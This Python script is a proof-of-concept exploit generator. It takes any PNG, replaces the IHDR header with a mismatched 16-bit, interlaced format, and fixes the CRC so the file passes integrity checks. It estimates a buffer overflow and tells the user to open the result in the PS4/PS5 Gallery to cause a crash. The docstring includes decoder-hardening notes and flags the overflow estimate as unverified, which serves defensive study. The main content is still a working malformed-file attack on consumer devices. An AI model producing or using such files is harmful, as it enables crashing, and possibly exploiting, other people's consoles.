import struct
import sys
import zlib


def make_exploit_png(input_png, output_png="poc.png"):
    """Write a copy of *input_png* whose IHDR no longer matches its pixel data.

    The IHDR chunk is re-emitted with the original width and height but with
    bit depth 16, colour type 2 (truecolour RGB) and interlace method 1
    (Adam7), and its CRC is recomputed. Every other chunk up to and including
    IEND is copied byte-for-byte, so the IDAT stream still holds data encoded
    for the *original* format.

    Review notes for anyone hardening a PNG decoder against this input:

    * The file is structurally valid (signature, chunk lengths and CRCs all
      check out), so CRC verification alone will not reject it.
    * A decoder has to size its row and image buffers from the IHDR it
      actually parsed and bound every write by that allocation. It should
      also fail cleanly when the inflated IDAT length disagrees with the
      size the header implies.
    * The "expected overflow" figure printed below is the author's estimate.
      Nothing in this file establishes how any particular decoder allocates
      its buffers.

    Args:
        input_png: Path of the PNG to read.
        output_png: Path of the file to write (default ``"poc.png"``).

    Returns:
        None. Prints a message and writes nothing if the input does not
        start with the PNG signature.
    """
    with open(input_png, "rb") as src:
        raw = src.read()

    signature = b"\x89PNG\r\n\x1a\n"
    if raw[:8] != signature:
        print("[-] Not a valid PNG file")
        return

    out = bytearray(signature)
    width = height = 0
    total = len(raw)
    offset = 8

    # Each chunk is: 4-byte big-endian length, 4-byte type, data, 4-byte CRC.
    # Stop as soon as fewer than 8 bytes (length + type) remain.
    while offset + 8 <= total:
        (length,) = struct.unpack_from(">I", raw, offset)
        chunk_type = raw[offset + 4:offset + 8]
        span = 12 + length

        if chunk_type == b"IHDR" and length >= 13:
            # Dimensions are preserved; only the format fields are replaced.
            width, height = struct.unpack_from(">II", raw, offset + 8)
            header = struct.pack(
                ">IIBBBBB",
                width,
                height,
                16,  # bit depth
                2,   # colour type: truecolour (RGB)
                0,   # compression method
                0,   # filter method
                1,   # interlace method: Adam7
            )
            tagged = b"IHDR" + header
            out += struct.pack(">I", len(header))
            out += tagged
            # The CRC covers type + data, so the rewritten chunk passes
            # integrity checks.
            out += struct.pack(">I", zlib.crc32(tagged) & 0xffffffff)
            print(f"[+] Modified IHDR → {width}x{height} | 16-bit RGB | Interlaced (Adam7)")
        elif offset + span > total:
            # Truncated chunk: drop it and everything after it.
            break
        else:
            # All other chunks, IDAT included, pass through untouched.
            out += raw[offset:offset + span]

        offset += span
        if chunk_type == b"IEND":
            # Anything after IEND is not copied.
            break

    with open(output_png, "wb") as dst:
        dst.write(out)

    # Author's estimate: 6 bytes per pixel (16-bit RGB) versus 4 bytes per pixel.
    # NOTE(review): the 4-bytes-per-pixel allocation is an assumption about
    # the target decoder that this file does not verify.
    pixels = width * height
    overflow_kb = ((pixels * 6) - (pixels * 4)) / 1024
    print(f"[+] PNG saved: {output_png}")
    print(f" → Expected overflow size ≈ {overflow_kb:.1f} KB")
    print(" → Open it in PS4 PS5 Gallery → should trigger CE-34196-3 or instant crash")


if __name__ == "__main__":
    # Exactly one argument is expected: the path of the source PNG.
    # NOTE(review): the usage text seems to have lost its argument
    # placeholder; it is reproduced here as found.
    if len(sys.argv) != 2:
        print("Usage: python make_png.py ")
        sys.exit(1)
    make_exploit_png(sys.argv[1])